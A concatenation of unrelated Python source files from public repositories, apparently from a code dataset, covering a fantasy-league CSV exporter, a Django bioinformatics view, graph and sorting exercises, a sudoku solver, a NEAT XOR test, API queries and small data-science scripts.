2+ people with the same name play the same position), then we give up\n and continue using the id from the League object because we can't be sure which id is correct.\n\n :param file_name: Name of the CSV to write data to, and if, already existing, load data from.\n :type file_name: str\n :param league: League data.\n :type league: League\n :param deduplicate: If True, deduplicates players.\n :type deduplicate: bool\n \"\"\"\n\n players_output = {}\n if os.path.isfile(file_name):\n logger.info(f\"{file_name} exists, loading existing players\")\n with open(file_name, encoding=\"utf-8\") as infile:\n csv_reader = csv.DictReader(infile)\n for row in csv_reader:\n player_tuple = (row[\"player_name\"], row[\"player_position\"])\n if player_tuple not in players_output:\n players_output[player_tuple] = set()\n\n players_output[player_tuple].add(row[\"player_id\"])\n\n for _, season in league.seasons.items():\n for _, week in season.weeks.items():\n for game in week.games:\n for team_data in game.team_data:\n for player in team_data.roster.starters:\n player_tup = (player.name, player.position)\n potential_ids = players_output.get(player_tup, {player.id})\n if not deduplicate or len(potential_ids) != 1:\n potential_ids.add(player.id)\n players_output[player_tup] = potential_ids\n\n for player in team_data.roster.bench:\n player_tup = (player.name, player.position)\n potential_ids = players_output.get(player_tup, {player.id})\n if not deduplicate or len(potential_ids) != 1:\n potential_ids.add(player.id)\n players_output[player_tup] = potential_ids\n\n logger.info(f\"Writing players to {file_name}\")\n with open(file_name, \"w\", encoding=\"utf-8\") as outfile:\n fieldnames = [\"player_id\", \"player_name\", \"player_position\"]\n writer = csv.DictWriter(outfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for (p_name, p_pos), p_ids in players_output.items():\n for p_id in p_ids:\n writer.writerow(\n {\"player_id\": p_id, \"player_name\": p_name, \"player_position\": p_pos}\n )\n","repo_name":"lynshi/league-history-collector","sub_path":"league_history_collector/transformer/csv/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7485278786","text":"from ...helpers.common import *\nfrom django.contrib.staticfiles.templatetags.staticfiles import static\nfrom django.core.files.storage import default_storage\nfrom django.contrib.staticfiles import finders\n\ndef get_card(request, symbol=None, database=None):\n \"\"\"\n Returns a card with information about a human gene, a planarian gene or a \n planarian contig.\n \n Accepts:\n * **GET**\n * **GET + AJAX**\n\n Args:\n symbol (`str`): Identifier of entity for which to generate card.\n database (`str`): Database of symbol.\n\n Response:\n * **GET**:\n * **node** (:obj:`Smesgene` or :obj:`Human` or :obj:`PlanarianContig`): Instance of card element.\n * **transcripts** (`list` of :obj:`PlanarianContig`): List of contigs associated with gene (only for :obj:`PlanarianGene`) \n * **best_transcript** (:obj:`PlanarianContig`): Best planarian contig for gene (only for :obj:`PlanarianGene`)\n * **json_graph** (str): Interaction graph of predicted interactions in JSON format (only for :obj:`PlanarianGene` or :obj:`PlanarianContig`). \n * **homologs** (`list` of `tuple`): Homologous :obj:`PlanarianContig` s for Human gene. 
First element is Database name, second is :obj:`PlanarianContig` object (only for :obj:`Human`).\n * **domains** (str): PFAM domains in JSON format (only for :obj:`PlanarianContig`).\n\n * **GET + AJAX**:\n * **HttpResponse**: Response with a file.\n \n Example:\n\n .. code-block:: bash\n\n curl -H \"X-REQUESTED-WITH: XMLHttpRequest\" \\\\\n -H \"Content-Type: application/json\" \\\\\n -X GET \\\\\n \"https://compgen.bio.ub.edu/PlanNET/info_card?target=SMESG000005930.1&targetDB=Smesgene\"\n \n \"\"\"\n if request.method == 'GET' and request.is_ajax():\n symbol = request.GET['target']\n database = request.GET['targetDB']\n template = \"\"\n try:\n \n if database == \"Human\":\n template = \"NetExplorer/human_card.html\"\n card_node = HumanNode(symbol, database)\n homologs = card_node.get_homologs()\n card_node.get_summary()\n all_databases = Dataset.get_allowed_datasets(request.user)\n sorted_homologs = list()\n for db in all_databases:\n if db.name in homologs:\n sorted_homologs.append((db.name, homologs[db.name]))\n else:\n sorted_homologs.append((db.name, list()))\n elif database == \"Smesgene\":\n template = \"NetExplorer/smesgene_card.html\"\n card_node = PlanarianGene(symbol, database)\n contigs = card_node.get_planarian_contigs()\n best_contig = card_node.get_best_transcript()\n graph = GraphCytoscape()\n card_node.get_tf_motifs(\"promoter\")\n card_node.get_tf_motifs(\"enhancer\")\n has_logo_proximal = gene_has_logo(\"promoter\", card_node.symbol)\n has_logo_enhancer = gene_has_logo(\"enhancer\", card_node.symbol)\n \n if best_contig:\n best_contig.get_homolog()\n best_contig.get_neighbours()\n best_contig.get_geneontology()\n if best_contig.homolog:\n best_contig.homolog.human.get_summary()\n nodes, edges = best_contig.get_graphelements()\n graph.add_elements(nodes)\n graph.add_elements(edges)\n\n else:\n template = \"NetExplorer/contig_card.html\"\n gsearch = GeneSearch(symbol, database)\n card_node = gsearch.get_planarian_contigs()[0]\n card_node.get_summary()\n card_node.get_neighbours()\n card_node.get_domains()\n card_node.get_geneontology()\n nodes, edges = card_node.get_graphelements()\n graph = GraphCytoscape()\n graph.add_elements(nodes)\n graph.add_elements(edges)\n except Exception as err:\n logging.error(\"Can't find symbol {} - {} in get_card() {}\".format(symbol, database, err))\n return render_to_response('NetExplorer/not_interactome.html')\n if database == \"Human\":\n response = {\n 'node' : card_node,\n 'homologs': sorted_homologs\n }\n elif database == \"Smesgene\":\n response = {\n 'node': card_node,\n 'transcripts': contigs,\n 'best_transcript': best_contig,\n 'json_graph': graph.to_json(),\n 'has_logo_proximal': has_logo_proximal,\n 'has_logo_enhancer': has_logo_enhancer\n }\n else:\n response = {\n 'node' : card_node,\n 'json_graph': graph.to_json(),\n 'domains' : card_node.domains_to_json()\n }\n \n if request.is_ajax():\n response['base_template'] = 'NetExplorer/null.html'\n else:\n response['base_template'] = 'NetExplorer/base.html'\n \n return render(request, template, response)\n\n\ndef gene_has_logo(re_type, symbol):\n print('Images/{}-images/{}-promoter.png'.format(re_type, symbol))\n return finders.find('Images/{}-images/{}-{}.png'.format(re_type, symbol, re_type))","repo_name":"scastlara/PlanNET","sub_path":"NetExplorer/views/http_api/plannet/get_card.py","file_name":"get_card.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
+{"seq_id":"33675035335","text":"is_cycled = False\n\ndef dfs(adj, node):\n is_visited[node] = \"in\"\n for n in adj[node]:\n if is_visited[n] == \"in\":\n global is_cycled\n is_cycled = True\n return\n if not is_visited[n]:\n dfs(adj, n)\n is_visited[node] = True\n\n\ndef check_cycle(adj):\n for node in range(n):\n if not is_visited[node]:\n dfs(adj, node)\n\n\nn, m = map(int, input().split())\nadj = [[] for _ in range(n)]\nis_visited = [False for _ in range(n)]\nfor i in range(m):\n a, b = map(int, input().split())\n adj[a - 1].append(b - 1)\ncheck_cycle(adj)\nprint(1 if is_cycled else 0)\n","repo_name":"edadasko/coursera_algorithms","sub_path":"graphs/acyclicity.py","file_name":"acyclicity.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5939182521","text":"import argparse\nimport logging\nimport os\nimport json\nimport cv2\n\nlogging.basicConfig(level=logging.getLevelName('DEBUG'), format='%(asctime)s - %(levelname)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')\nlogging.addLevelName(55, \"Hello!\")\nlogging.addLevelName(56, \"Goodbye!\")\nargParser = argparse.ArgumentParser(description=\"Picture and bounding box resize utility (AGAR compatible)\")\nargParser.add_argument(\"--image-folder\", default=\"images\", type=str, help=\"Path to the directory that contains images which should be resized\")\nargParser.add_argument(\"--width\", default=512, type=int, help=\"Picture width\")\nargParser.add_argument(\"--height\", default=512, type=int, help=\"Picture height\")\nargs = argParser.parse_args()\n\nlogging.log(55, 'Script started.')\n\nlogging.info(\"Creating output directory...\")\nfrom os import listdir, mkdir\nfrom os.path import isfile, join, exists\nfileList = [f for f in listdir(args.image_folder) if isfile(join(args.image_folder, f))]\noutput_folder = f\"{args.image_folder}_resized\"\nif not exists(output_folder):\n mkdir(output_folder)\n\nfor file in fileList:\n logging.info(f\"Resizing bounding boxes in {file} to {args.width}x{args.height}...\")\n if file.endswith(\".jpg\"):\n continue\n filename = os.path.splitext(file)\n\n # Load the picture to get its size\n image = cv2.imread(f\"{args.image_folder}/{filename[0]}.jpg\")\n height = image.shape[0]\n width = image.shape[1]\n\n json_file = open(f\"{args.image_folder}/{filename[0]}.json\")\n annotation = json.load(json_file)\n json_file.close()\n\n scaleX = args.width / width\n scaleY = args.height / height\n\n # Note: Slight distortion might happen if the aspect ratio changes\n for label in annotation[\"labels\"]:\n label[\"x\"] = int(label[\"x\"] * scaleX)\n label[\"width\"] = int(label[\"width\"] * scaleX)\n label[\"y\"] = int(label[\"y\"] * scaleY)\n label[\"height\"] = int(label[\"height\"] * scaleY)\n\n # Save resized picture alongside the resized annotations\n image = cv2.resize(image, (args.width, args.height), interpolation = cv2.INTER_AREA)\n cv2.imwrite(f\"{output_folder}/{filename[0]}.jpg\", image)\n with open(f\"{output_folder}/{filename[0]}.json\", 'w') as file:\n file.write(json.dumps(annotation))\n\n # DEBUG\n '''\n for label in annotation[\"labels\"]:\n cv2.rectangle(image, (label[\"x\"], label[\"y\"]), (label[\"x\"] + label[\"width\"], label[\"y\"] + label[\"height\"]), (0, 0, 255), 1)\n cv2.imshow(\"Detected Circles\", image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n '''\n\nlogging.log(56, \"Script 
finished!\")","repo_name":"zingmars/bacterial-colony-analysis","sub_path":"1_Preparation/bounding_box_resize.py","file_name":"bounding_box_resize.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"31137563775","text":"import os\nimport ujson\nfrom fastapi import Request, Response, HTTPException\nfrom fastapi import APIRouter\nfrom slowapi import Limiter\nfrom slowapi.util import get_remote_address\n\n\n\nlimiter = Limiter(key_func=get_remote_address)\nrouter = APIRouter(tags=[\"Game Data\"])\n\n@router.get(\"/assets\",\n name=\"Link to download a zip with all assets\")\n@limiter.limit(\"5/second\")\nasync def assets(request: Request, response: Response):\n return {\"download-link\" : \"https://cdn.clashking.xyz/Out-Sprites.zip\"}\n\n\n\n@router.get(\"/json/{type}\",\n name=\"View json game data (/json/list, for list of types)\")\n@limiter.limit(\"5/second\")\nasync def json(type: str, request: Request, response: Response):\n if type == \"list\":\n return {\"files\" : [\"troops\", \"heroes\", \"hero_equipment\", \"spells\", \"buildings\", \"pets\", \"supers\", \"townhalls\", \"translations\"]}\n file_name = f\"game-json/{type}.json\"\n file_path = os.getcwd() + \"/\" + file_name\n with open(file_path) as json_file:\n data = ujson.load(json_file)\n return data","repo_name":"MagicTheDev/ClashKing","sub_path":"API/game_data.py","file_name":"game_data.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"30231259801","text":"def solution(record):\n\n recordlist = []\n nicknamedic = {}\n printlist = []\n\n for i in record:\n temp = i.split(' ')\n recordlist.append(temp)\n \n for rec in recordlist:\n state = rec[0]\n userid = rec[1]\n nickname = rec[2] if len(rec) > 2 else ''\n\n if userid not in nicknamedic:\n nicknamedic[userid] = nickname\n else:\n if nicknamedic.get(userid) != nickname and state != 'Leave':\n nicknamedic[userid] = nickname\n \n \n for rec in recordlist:\n state = rec[0]\n userid = rec[1]\n nickname = nicknamedic.get(userid)\n\n if state == 'Enter':\n printstr = \"%s님이 들어왔습니다.\"%nickname\n printlist.append(printstr) \n \n elif state == \"Leave\":\n printstr = \"%s님이 나갔습니다.\"%nickname\n else:\n continue\n\n answer = printlist\n \n return answer\n\ndef solution2(record):\n nicknamedic = {rec.split(' ')[1] : rec.split(' ')[-1] for rec in record if not rec.split(' ')[0] != 'Leave'}\n printlist = [f\"{nicknamedic[rec.split(' ')[1]]}님이 입장 했습니다.\" if rec.startswith('Enter') else f\"{nicknamedic[rec.split(' ')[1]]}님이 퇴장하셨습니다.\" for rec in record if not rec.split(' ')[0] =='Change' ]","repo_name":"tjsgh531/codingTest-python","sub_path":"DAY-7/solution_level2.py","file_name":"solution_level2.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17885324503","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\"\"\"\r\n\r\nimport pandas as pd\r\n\r\ndata = pd.read_csv(\"befkbhalderstatkode.csv\")\r\n\r\nrow_count = sum(1 for row in data)\r\n\r\nprint(\"pp \", row_count)\r\n","repo_name":"Burhan27/Big_Data","sub_path":"befolkningsdata.py","file_name":"befolkningsdata.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
+{"seq_id":"37331140822","text":"import tkinter as tk\n\n# Window and its dimensions.\nroot = tk.Tk()\nroot.geometry(\"305x365\")\n\n# Class for drawing the window.\nclass Draw():\n\n # Class initialization.\n def __init__(self, root, numbers_input):\n self.root = root\n self.grid = []\n self.numbers_input = numbers_input\n\n # Windows title.\n root.title(\"Sudoku Solver\")\n\n # Creating empty list (grid).\n for i in range(9):\n self.grid.append([0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n # Drawing the input squares.\n for i in range(9):\n for j in range(9):\n # Chosing the color based on position.\n if (3 <= i <= 5) and (j < 3 or j > 5):\n color = \"grey\"\n elif (i < 3 or i > 5) and (3 <= j <= 5):\n color = \"grey\"\n else:\n color = \"white\"\n # Drawing the input squares.\n self.grid[i][j] = tk.Entry(root, width=2, font=(\"Arial\", 20),\n bg=color, borderwidth=1,\n textvar=self.numbers_input[i][j],cursor=\"arrow\")\n # Deleting input when input is invalid and user moves mouse.\n self.grid[i][j].bind(\"\", self.correct_input)\n # Organizing squares into a grid in tkinter\n self.grid[i][j].grid(row=i, column=j)\n\n # Button for clearing the board.\n clear = tk.Button(root, bg=\"grey\", text=\"Clear\", font=(\n \"Arial\", 10), fg=\"black\", command=self.clear_board)\n clear.place(x=102, y=330)\n\n # Button to solve the sudoku.\n solve = tk.Button(root, bg=\"grey\", text=\"Solve\", font=(\n \"Arial\", 10), fg=\"black\", command=self.solve)\n solve.place(x=162, y=330)\n\n # Function for correcting the input\n def correct_input(self, event):\n for i in range(9):\n for j in range(9):\n # Deletes the value if the input does not imply to conditions\n if len(self.numbers_input[i][j].get()) > 1:\n self.numbers_input[i][j].set(\"\")\n if self.numbers_input[i][j].get() not in [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n self.numbers_input[i][j].set(\"\")\n\n # Function to clear the board.\n def clear_board(self):\n for i in range(9):\n for j in range(9):\n self.numbers_input[i][j].set(\"\")\n\n # Function to solve the sudoku (call the solve Class)\n def solve(self):\n solution = Solve()\n\n\n# Fill inputed number with zeros.\nnumbers_input = []\nfor i in range(9):\n numbers_input.append([0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n# Add input from the user to the list.\nfor i in range(9):\n for j in range(9):\n numbers_input[i][j] = tk.StringVar(root)\n\n\nclass Solve():\n def __init__(self):\n self.fill_zero()\n self.solve()\n\n # Input zeros into empty fields\n def fill_zero(self):\n for i in range(9):\n for j in range(9):\n if numbers_input[i][j].get() not in [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]:\n numbers_input[i][j].set(0)\n\n # Return coorindates of empty field.\n def empty(self):\n for i in range(9):\n for j in range(9):\n if numbers_input[i][j].get() == \"0\":\n return (i, j)\n # If no empty field is found, nothing is returned.\n return None\n\n # Check possible numbers in one position.\n def possible(self, number, coor):\n\n # Check Row.\n for i in range(9):\n if numbers_input[coor[0]][i].get() == str(number) and coor[1] != i:\n return False\n\n # Check Column.\n for i in range(9):\n if numbers_input[i][coor[1]].get() == str(number) and coor[0] != i:\n return False\n\n # Check Square.\n box_x = coor[1] // 3\n box_y = coor[0] // 3\n\n # Check in 3x3 coordinates.\n for i in range(box_y * 3, box_y * 3 + 3):\n for j in range(box_x * 3, box_x * 3 + 3):\n if numbers_input[i][j].get() == str(number) and (i, j) != coor:\n return False\n\n return True\n\n # Function 
to solve sudoku using backtracking.\n def solve(self):\n empty_field = self.empty()\n\n # If nothing is empty, end the solving.\n if not empty_field:\n return True\n # Else find the coordinates of the empty field\n else:\n row, col = empty_field\n\n # If the number is possible, put it in the position.\n for i in range(1, 10):\n if self.possible(i, (row, col)):\n numbers_input[row][col].set(i)\n\n # End the function if nothing remains empty.\n if self.solve():\n return True\n\n # If nothing is possible, go back.\n numbers_input[row][col].set(\"0\")\n\n return False\n\n# Class initialization.\nDraw(root, numbers_input)\n\n# Tkinter ending the program.\ntk.mainloop()\n","repo_name":"GBoGH/Sudoku-Solver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41116987647","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 4 17:20:05 2019\r\n\r\n@auth farukkutlu\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# Read the distance-matrix as 81x81 data-frame using pandas.\r\ndf1 = pd.read_excel('distancematrix.xls', header=2)\r\ndf1.drop(['İL ADI', 'İL PLAKA NO'], axis=1, inplace=True)\r\n# Read the Coordinates-matrix as 81x2 data-frame using pandas.\r\ndf2 = pd.read_excel('Coordinates.xlsx', header=0)\r\n# Converting and saving the data-frames to numpy-arrays of (81x81) and (81x2).\r\ndistances = df1.values\r\ncoordinates = df2.values\r\n#np.savetxt('Distances Array.txt', distances)\r\n#np.savetxt('Coordinates Array.txt', coordinates)\r\n# Creating the necessary functions.\r\n\"\"\" The get_path function always return with a list starting with 5.\r\n which means all the paths start with Ankara. 
\"\"\"\r\ndef get_path(distances, n=81):\r\n path, l, short, ind = [5], list(range(n)), 10000, 0\r\n l.pop(5)\r\n for j in range(len(l)):\r\n for i in l:\r\n if distances[path[-1],l[l.index(i)]] < short:\r\n short = distances[path[-1],l[l.index(i)]]\r\n ind = i\r\n path.append(ind)\r\n l.pop(l.index(ind))\r\n short = 10000\r\n return path\r\n\r\ndef get_path_length(path):\r\n path = np.append(path,path[0])\r\n total_length = 0.0\r\n for i in range(len(path)-1):\r\n j, k = path[i], path[i+1]\r\n total_length += distances[j, k]\r\n return total_length\r\n\r\ndef plot_path(path):\r\n path = np.append(path,path[0])\r\n latitude_list = coordinates[:,0]\r\n longitude_list = coordinates[:,1]\r\n path_latitude = latitude_list[path]\r\n path_longitude = longitude_list[path]\r\n lon, lat = np.array(path_longitude), np.array(path_latitude)\r\n img = plt.imread(\"harita.png\")\r\n fig, ax = plt.subplots()\r\n ax.imshow(img, extent=[0, 1347, 0, 721])\r\n ax.plot(lon*70-70*25.8, lat*84-84*34, '--', linewidth=2, color='firebrick')\r\n# plt.savefig('MyMap.png', dpi=1200)\r\n plt.show()\r\n return None\r\n\r\nshortest_path = get_path(distances, 81)\r\ntotal_length = get_path_length(shortest_path)\r\nprint()\r\nprint(str(total_length) + 'km calculated for the path.')\r\nplot_path(shortest_path)\r\n","repo_name":"omerfarukkutlu/python-final-project","sub_path":"My_Algorithm_Shortest_Path.py","file_name":"My_Algorithm_Shortest_Path.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36856154010","text":"def swap(lst, i, j):\n temp = lst[i]\n lst[i] = lst[j]\n lst[j] = temp\n\ndef bubble_sort(lst):\n done = False\n while not done:\n done = True\n for i in range(len(lst)-1):\n if lst[i] > lst[i+1]:\n swap(lst, i, i+1)\n done = False\n return lst\n\ndef insertion_sort(lst):\n for i in range(1, len(lst)):\n curr = lst[i]\n j = i\n while j > 0 and lst[j] < lst[j-1]:\n swap(lst, j, j-1)\n j -= 1\n return lst\n\ndef selection_sort(lst):\n for i in range(len(lst)-1):\n min_i = i\n for j in range(i+1, len(lst)):\n if lst[j] < lst[min_i]:\n min_i = j\n swap(lst, i, min_i)\n return lst\n","repo_name":"michaelschung/bc-ds-and-a","sub_path":"Unit2-Iteration/sorting/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37510063487","text":"from django.contrib.auth.models import Permission, Group\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.management import BaseCommand\n\nfrom apps.meituan.models import Merchant, GoodsCategory, Goods, Order\n\n\nclass Command(BaseCommand):\n # 分组创建的操作和权限的赋予\n def handle(self, *args, **options):\n # 1.编辑组\n edit_content_types = [\n ContentType.objects.get_for_model(Merchant),\n ContentType.objects.get_for_model(GoodsCategory),\n ContentType.objects.get_for_model(Goods),\n ]\n edit_permissions = Permission.objects.filter(content_type__in=edit_content_types)\n edit_group = Group.objects.create(name='编辑')\n edit_group.permissions.set(edit_permissions)\n edit_group.save()\n self.stdout.write('编辑组创建成功!')\n\n # 2.财务组\n finance_content_types = [\n ContentType.objects.get_for_model(Order),\n ]\n finance_permissions = Permission.objects.filter(content_type__in=finance_content_types)\n finance_group = Group.objects.create(name='财务')\n finance_group.permissions.set(finance_permissions)\n finance_group.save()\n 
self.stdout.write('财务组创建成功!')\n\n # 3.管理组\n # queryset对象不支持直接的相加‘+’的操作,这里采用的union;\n # 列表数据支持相加的操作'+'\n admin_permissions = edit_permissions.union(finance_permissions)\n admin_group = Group.objects.create(name='管理')\n admin_group.permissions.set(admin_permissions)\n admin_group.save()\n self.stdout.write('管理组创建成功!')\n","repo_name":"Cherish-1119/meituan","sub_path":"apps/mtauth/management/commands/initgroup.py","file_name":"initgroup.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29707032466","text":"#!/usr/bin/python3\nfrom __future__ import print_function\n\nimport os\nimport sys\n#sys.path.insert(0, '/home/peter/code/projects/MultiNEAT') # duh\nimport time\nimport random as rnd\nimport numpy as np\nimport pickle as pickle\nimport MultiNEAT as NEAT\nfrom MultiNEAT import EvaluateGenomeList_Serial\nfrom MultiNEAT import GetGenomeList, ZipFitness\n\nfrom concurrent.futures import ProcessPoolExecutor, as_completed\n\n\ndef evaluate(genome):\n net = NEAT.NeuralNetwork()\n genome.BuildPhenotype(net)\n\n error = 0\n\n # do stuff and return the fitness\n net.Flush()\n net.Input(np.array([1., 0., 1.])) # can input numpy arrays, too\n # for some reason only np.float64 is supported\n for _ in range(2):\n net.Activate()\n o = net.Output()\n error += abs(1 - o[0])\n\n net.Flush()\n net.Input([0, 1, 1])\n for _ in range(2):\n net.Activate()\n o = net.Output()\n error += abs(1 - o[0])\n\n net.Flush()\n net.Input([1, 1, 1])\n for _ in range(2):\n net.Activate()\n o = net.Output()\n error += abs(o[0])\n\n net.Flush()\n net.Input([0, 0, 1])\n for _ in range(2):\n net.Activate()\n o = net.Output()\n error += abs(o[0])\n\n return (4 - error) ** 2\n\n\nparams = NEAT.Parameters()\nparams.PopulationSize = 100\nparams.DynamicCompatibility = True\nparams.NormalizeGenomeSize = True\nparams.WeightDiffCoeff = 0.1\nparams.CompatTreshold = 2.0\nparams.YoungAgeTreshold = 15\nparams.SpeciesMaxStagnation = 15\nparams.OldAgeTreshold = 35\nparams.MinSpecies = 2\nparams.MaxSpecies = 10\nparams.RouletteWheelSelection = False\nparams.RecurrentProb = 0.0\nparams.OverallMutationRate = 1.0\n\nparams.ArchiveEnforcement = False\n\nparams.MutateWeightsProb = 0.05\n\nparams.WeightMutationMaxPower = 0.5\nparams.WeightReplacementMaxPower = 8.0\nparams.MutateWeightsSevereProb = 0.0\nparams.WeightMutationRate = 0.25\nparams.WeightReplacementRate = 0.9\n\nparams.MaxWeight = 8\n\nparams.MutateAddNeuronProb = 0.001\nparams.MutateAddLinkProb = 0.3\nparams.MutateRemLinkProb = 0.0\n\nparams.MinActivationA = 4.9\nparams.MaxActivationA = 4.9\n\nparams.ActivationFunction_SignedSigmoid_Prob = 0.0\nparams.ActivationFunction_UnsignedSigmoid_Prob = 1.0\nparams.ActivationFunction_Tanh_Prob = 0.0\nparams.ActivationFunction_SignedStep_Prob = 0.0\n\nparams.CrossoverRate = 0.0\nparams.MultipointCrossoverRate = 0.0\nparams.SurvivalRate = 0.2\n\nparams.MutateNeuronTraitsProb = 0\nparams.MutateLinkTraitsProb = 0\n\nparams.AllowLoops = True\nparams.AllowClones = True\n\ndef getbest(i):\n g = NEAT.Genome(0, 3, 0, 1, False, NEAT.ActivationFunction.UNSIGNED_SIGMOID,\n NEAT.ActivationFunction.UNSIGNED_SIGMOID, 0, params, 0)\n pop = NEAT.Population(g, params, True, 1.0, i)\n pop.RNG.Seed(int(time.clock()*100))\n\n generations = 0\n for generation in range(1000):\n genome_list = NEAT.GetGenomeList(pop)\n fitness_list = EvaluateGenomeList_Serial(genome_list, evaluate, display=False)\n NEAT.ZipFitness(genome_list, fitness_list)\n pop.Epoch()\n generations = 
generation\n best = max(fitness_list)\n if best > 15.0:\n break\n\n return generations\n\n\ngens = []\nfor run in range(100):\n gen = getbest(run)\n gens += [gen]\n print('Run:', run, 'Generations to solve XOR:', gen)\navg_gens = sum(gens) / len(gens)\n\nprint('All:', gens)\nprint('Average:', avg_gens)\n","repo_name":"peter-ch/MultiNEAT","sub_path":"examples/TestNEAT_xor.py","file_name":"TestNEAT_xor.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","stars":323,"dataset":"github-code","pt":"54"} +{"seq_id":"30805456375","text":"import requests as rq\nfrom tabulate import tabulate\n\ndata = []\n# aqui obtengo el nombre de pikachu solicitandolo a la api de pokemon\n# response = rq.get(\"https://pokeapi.co/api/v2/pokemon/25\")\n# rs = response.json()\n# rs2 = rs[\"forms\"][0][\"name\"]\n# print(rs2)\n\nresponse2 = rq.get(\"https://pokeapi.co/api/v2/pokemon?limit=100\")\nres = response2.json()\nfor i in range(25):\n data.append([i + 1, res[\"results\"][i][\"name\"], res[\"results\"][i][\"url\"]])\n\ntabla = tabulate(data, headers=[\"Nº\", \"NAME\", \"URL\"])\nprint(\"\\n\\n\", tabla, \"\\n\\n\")","repo_name":"LeoMarqz21/Algoritmos_con_python","sub_path":"ConsultaApi.py","file_name":"ConsultaApi.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72171943203","text":"\"\"\"\nLinear Regression Project\n\"\"\"\nfrom warnings import filterwarnings\nfrom numpy import sqrt\nfrom pandas import read_csv, DataFrame\nfrom matplotlib.pyplot import show, scatter, xlabel, ylabel, figure\nfrom seaborn import set_palette, set_style, jointplot, pairplot, lmplot, distplot\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\n\n# Get the Data\nfilterwarnings(\"ignore\", category=FutureWarning)\ncustomers = DataFrame(read_csv(\"Ecommerce Customers\"))\nprint(customers.head())\nprint(customers.describe())\nprint(customers.info())\n\n# Exploratory Data Analysis\nset_palette(\"GnBu_d\")\nset_style(\"whitegrid\")\n# More time on site, more money spent.\njointplot(x=\"Time on Website\", y=\"Yearly Amount Spent\", data=customers)\njointplot(x=\"Time on App\", y=\"Yearly Amount Spent\", data=customers)\njointplot(x=\"Time on App\", y=\"Length of Membership\", kind=\"hex\", data=customers)\npairplot(customers)\nlmplot(x=\"Length of Membership\", y=\"Yearly Amount Spent\", data=customers)\n\n# Training and Testing Data\nX = customers[\n [\"Avg. 
Session Length\", \"Time on App\", \"Time on Website\", \"Length of Membership\"]\n]\ny = customers[\"Yearly Amount Spent\"]\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=101\n)\n\n# Training the Model\nlm = LinearRegression()\nlm.fit(X_train, y_train)\n# The coefficients\nprint(\"Coefficients: \\n\", lm.coef_)\n\n# Predicting Test Data\npredictions = lm.predict(X_test)\nfigure()\nscatter(y_test, predictions)\nxlabel(\"Y Test\")\nylabel(\"Predicted Y\")\n\n# Evaluating the Model\nprint(\"MAE:\", mean_absolute_error(y_test, predictions))\nprint(\"MSE:\", mean_squared_error(y_test, predictions))\nprint(\"RMSE:\", sqrt(mean_squared_error(y_test, predictions)))\n\n# Residuals\nfigure()\ndistplot((y_test - predictions), bins=50)\n\n# Coefficients\ncoeffecients = DataFrame(lm.coef_, X.columns)\ncoeffecients.columns = [\"Coeffecient\"]\nprint(coeffecients)\n\n# LAST STEP\nshow()\n","repo_name":"jgyy/py-dsml-jose","sub_path":"15/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12260550705","text":"# Given an array containing None values fill in the None values with most recent\r\n# non None value in the array\r\n\r\narray1 = [1, None, 2, 3, None, None, 5, None]\r\n\r\n\r\ndef solution(nums):\r\n for ind, num in enumerate(nums):\r\n if num is None:\r\n nums[ind] = nums[ind-1]\r\n\r\n return nums\r\n\r\n\r\n# Given two sentences, return an array that has the words that appear in one sentence and not\r\n# the other and an array with the words in common.\r\n\r\nsentence1 = 'We are really pleased to meet you in our city'\r\nsentence2 = 'The city was hit by a really heavy storm'\r\n\r\n\r\ndef solution2(sent1, sent2):\r\n\r\n common = []\r\n not_common = []\r\n\r\n sent1 = sent1.split()\r\n sent2 = sent2.split()\r\n\r\n for word1 in sent1:\r\n for 